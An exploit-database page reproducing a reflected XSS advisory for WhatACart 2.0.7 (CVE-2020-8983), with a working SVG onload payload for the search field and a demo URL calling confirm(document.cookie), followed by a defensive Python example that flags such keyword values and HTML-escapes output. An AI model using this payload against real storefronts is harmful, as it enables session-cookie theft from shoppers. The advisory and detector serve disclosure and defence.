WhatACart 2.0.7 Cross Site Scripting

CVE: CVE-2020-8983
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-12-27
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120055

Below is a copy:

WhatACart 2.0.7 Cross Site Scripting
# Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS
# Date: 2023-12-27
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://whatacart.com
# Version: 2.0.7
# Tested on: https://whatacart.com/demo


1) Go to this page: https://demo.whatacart.com/
2) Write this payload in the search field: <sVg/onLy=1 onLoaD=confirm(1)//
3) You will see the alert button: https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=
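
A defender-side example for the search request above, added here and not part of the advisory or of WhatACart's code: it flags `keyword` values on `/site/default/search` that decode to markup carrying an event-handler attribute, and shows the HTML-encoded form a results page should emit instead. The regex heuristic, the function names and the second and third sample URLs are assumptions of this example.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

SEARCH_PATH = "/site/default/search"   # endpoint from the advisory's URL
PARAM = "keyword"                      # reflected parameter from the advisory's URL

# Heuristic chosen for this example: a tag opener that later carries an
# on*= event-handler attribute, or a script tag / javascript: URI.
TAG_WITH_HANDLER = re.compile(r"<\s*[a-z][^>]*?[\s/]on[a-z]+\s*=", re.I | re.S)
SCRIPTISH = re.compile(r"<\s*script\b|javascript\s*:", re.I)

def decoded_keywords(url, max_rounds=3):
    """Return keyword values from a search URL, percent-decoded until stable."""
    parts = urlsplit(url)
    if parts.path.rstrip("/") != SEARCH_PATH:
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    out = []
    for v in values:
        for _ in range(max_rounds):      # normalise double-encoded input
            nxt = unquote_plus(v)
            if nxt == v:
                break
            v = nxt
        out.append(v)
    return out

def is_suspicious(url):
    """True when a decoded keyword contains markup with an event handler."""
    return any(TAG_WITH_HANDLER.search(v) or SCRIPTISH.search(v)
               for v in decoded_keywords(url))

def render_safe(keyword):
    """HTML-encode the keyword for element-body or quoted-attribute output."""
    return html.escape(keyword, quote=True)

# Sample requests: the first is the URL from step 3; the rest are constructed.
SAMPLES = [
    "https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=",
    "https://demo.whatacart.com/site/default/search?keyword=red+shoes&navsearch=",
    "https://demo.whatacart.com/site/default/search?keyword=%253CsVg%252FonLy%253D1&navsearch=",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(is_suspicious(url), decoded_keywords(url))
    print(render_safe("<sVg/onLy=1 onLoaD=confirm(1)//"))
```

`html.escape` covers output into an HTML element body or a quoted attribute; if the keyword is also written into a script block or a URL, that context needs its own encoder.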

Copyright ©2024 Exploitalert.
